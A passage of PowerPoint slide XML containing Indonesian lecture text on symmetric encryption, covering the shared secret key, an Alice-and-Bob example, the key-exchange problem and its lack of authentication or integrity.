              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengalahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>upaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kriptanalisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Algoritma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Simetris</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Algoritma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>simetris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>algoritma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di mana </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dekripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rahasia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rahasia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diketahui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh orang yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berwenang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Jika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hilang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dicuri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>maka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilanggar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>simetris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerahasiaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, Alice dan Bob </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rahasia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berikut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Alice dan Bob </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bertemu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyetujui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rahasia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berdua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencatat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rahasia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> orang lain yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menemukannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Alice </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengenkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cipher dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Alice </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengirimkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> ciphertext </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Bob </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Bob </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> ciphertext dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendekripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cipher yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>salinan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rahasianya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>simetris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>massal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jumlah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Masalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>utamanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagaimana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Alice dan Bob "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bertemu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyetujui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bertukar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Jika Mallory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencegat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendapatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> ciphertext, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>maka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rusak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>Nb. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>Perhatikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>simetris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>integritas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>. Alice dan Bob </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>rahasia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> yang </a:t>
